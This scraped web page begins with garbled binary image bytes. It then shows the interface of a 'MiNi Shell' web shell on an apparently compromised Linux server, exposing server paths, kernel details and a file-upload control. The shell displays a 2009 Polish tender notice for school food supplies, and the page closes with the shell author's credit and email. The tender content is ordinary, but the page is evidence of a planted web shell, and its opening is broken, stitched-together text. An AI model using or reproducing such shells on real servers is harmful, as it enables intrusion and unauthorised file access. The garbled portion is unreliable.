JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090810/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090810/271828-N-2009.html

<p class="kh_header"><b>Stare Juchy: Dostawa artykułów żywnościowych</b><br>
<b>Numer ogłoszenia: 271828 - 2009; data zamieszczenia: 10.08.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Samorządowych , ul. Mazurska 11, 19-330 Stare Juchy, woj. warmińsko-mazurskie, tel. 087 6199026.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zssstarejuchy.boo.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa artykułów żywnościowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Dostawa artykułów żywnościowych -7 pakietów: skrzydełka z kurczaka kg1100, ćwiartka z kurczaka1000, pierś z kurczaka 700 kg, udziec z indyka bez kości100 kg, wątróbka drobiowa 300 kg,  filet z indyka 200 kg,  polędwica drobiowa 10 kg,  mięso udowe z kurczaka 50 kg,  filet z indyka wędzony 10 kg., marchewka kg 750, por 150kg,  seler 150 kg,  pietruszka korzeń 150 kg, rzodkiewka biała sopel  400 kg, cebula 700 kg, burak 600 kg, kapusta biała 1000 kg, kapusta czerwona 300 kg, kapusta pekińska 300kg, ogórek 600 kg, pomidory 300 kg,  kapusta biała   szt. 120, sałata szt. 600, rzodkiewka pęczek 600, szczypior 600 pęcz, czosnek   szt.60, natka pietruszki pęczek 150, koperek zielony pęczek 150, kalafior szt. 50, pieczarki 300 kg, jabłka2500 kg, pomarańcze 800kg, banany 1600 kg, mandarynki 700 kg,  gruszki 600 kg,  brzoskwinie150 kg,  nektarynki150kg,  cytryny50 kg, kiwi szt. 2100, truskawki 50 kg, ogórek konserwowy szt. 80,  ogórek kiszony  400g -400szt., kapusta kiszona 750 kg. groch połówki 400 g szt. 250 fasola, biała drobna 400g szt.120,  fasola -jaś 500g szt.200, fasolka szparagowa mrożona - 250 szt. kalafior mrożony szt. 360, truskawka mrożona 450g -300 szt, marchew kostka mrożona 450g- 1000 szt,  mieszanka kompotowa wieloskładnikowa mrożona 450g - 1500 szt, mieszanka warzywna 7 składnikowa 450g- 200 szt,  czarna porzeczka mrożona 500g -50 szt, pyzy ziemniaczane  500g - 600szt,  pyzy ziemniaczane z mięsem 500g - 600szt, pierogi z serem 500g -500 szt, pierogi z jagodami 500g- 500szt,  filet rybny tilapia 500 kg,  hamburger rybny- 100 kg,  paluszki rybne z fileta 200 kg,  makrela wędzona 10 kg, śledź marnowany280 kg. śledź solony 40 kg, łopatka bez kości 1000 kg, karkówka bez kości 300 kg, schab bez kości 350kg,  polędwiczki wieprzowe 350 kg, golonka 150 kg, żeberka wieprzowe 350 kg, szynka bez kości 700 kg, kości -karkowe 250 kg, kości schabowe 350 kg, boczek surowy bez kości 60 kg,  boczek wędzony bez kości 200 kg, kiełbasa toruńska 200 kg,  kiełbasa zwyczajna 200 kg, parówka 100 kg, kiełbasa żywiecka 10 kg,  kiełbasa typu firmowa 100 kg, polędwica wędzona 10 kg, ogonówka 10 kg, maka 650 kg, mąka ziemniaczana 20 kg, kasza gryczana 50 kg, kasza jęczmienna 110 kg, kasza manna 80 kg,  ryż 300 kg, makaron 1600szt. płatki owsiane 30 kg, płatki ryżowe 30 szt, płatki kukurydziane 100 szt, kawa zbożowa 70 szt, kakao 200g 20 szt, herbata 40 szt. koncentrat pomidorowy 0,9 l -100 szt, przecier ogórkowy 300g -450 sz,. przecier szczawiowy 285g - 350szt, ketchup 5 kg-szt.30,  koncentrat barszczu szt.25 olej 700 l, pieprz 15g 500 szt, ziele angielskie 15g  -40 szt, liść laurowy 40 szt, majeranek - 200 szt. przyprawa warzywna   200g - 360 szt. kwasek cytrynowy 50g - 400 szt, sos 1050  szt, kostka rosołowa  100 op. przyprawa  magi 100 szt. Herbatniki 50g-150szt, chrzan stołowy 280g50 szt, musztarda 150 szt, konserwy szt 120, konserwy rybne 60 szt, majonez 150 szt. syrop owocowy 560ml  szt100, dzem 280g -szt 80, groszek konserwowy 200g szt, 200, kisiel - 650 szt, budyń 65g 650 szt, cynamon15g  35 szt, sól 300 kg, cukier  1000 kg, cukier puder 500g 20 szt. cukier waniliowy 16g- 200 szt, proszek do pieczenia 30g- 10 szt,,jajka 500 kg, mleko 3,2% 2500 l. śmietana 18% 400g-500g 1950 - szt, twaróg półtłusty 650 kg miksełko 200g 500 szt,  ser żółty 100 kg,  serek topiony 100g 100 szt,  jogurty szt. 8800, serek 4600 szt, drożdze 100 g-szt 30, chleb mieszany 550g szt.1500, chleb słonecznikowy 550g 250szt. chleb razowy 600 g, szt 250, bułka szt.4500, rogal szt.500, bułka maślana 200 szt. bułka słodka 4200szt, pączek - 1500 szt, bułka tarta 160 kg, chałka maślana 400g-zt.20.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.10.00.00-9, 15.20.00.00-0, 15.30.00.00-1, 15.40.00.00-2, 15.50.00.00-3, 15.60.00.00-4, 15.80.00.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 10.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają następujące warunki:
- posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
- posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym 
i osobami zdolnymi do wykonywania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia,
- znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, 
- nie podlegają wykluczeniu z postępowania o udzielenie zamówienia;
Ocena spełniania warunków udziału w postępowaniu dokonana zostanie zgodnie z formułą (spełnia - nie spełnia) w oparciu o informacje zawarte w dokumentach i oświadczeniach załączonych do oferty na potwierdzenie spełniania warunków udziału w postępowaniu..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca spełnia warunki udziału w postępowaniu określone w pkt 8.1. SIWZ, Wykonawca zobowiązany jest do dostarczenia niżej wymienionych dokumentów 
i oświadczeń: 
-Oświadczenie Wykonawcy, że spełnia warunki udziału w postępowaniu 
- Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert,
-oświadczenie, że nie zalega z opłatami na ubezpieczenie społeczne i nie zalega z płatnościami wymaganych prawem  podatków do Urzędu Skarbowego 
- Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia,ponoszą solidarną odpowiedzialność za wykonanie umowy
-Dokumenty wymagane, gdy kilka podmiotów składa wspólnie ofertę:
-Pełnomocnictwo do reprezentowania wszystkich podmiotów w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.
-Pozostałe dokumenty, wymagane w ofercie:
-Wypełniony i podpisany Formularz Ofertowy 
-Wypełnione i podpisane Formularze Cenowe.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.zssstarejuchy.boo.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Szkół Samorządowych w Starych Juchach ul. Mazurska 11, 19-330 Stare Juchy- sekretariat.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 18.08.2009 godzina 08:30, miejsce: Zespół Szkół Samorządowych w Starych Juchach ul. Mazurska 11, 19-330 Stare Juchy- sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com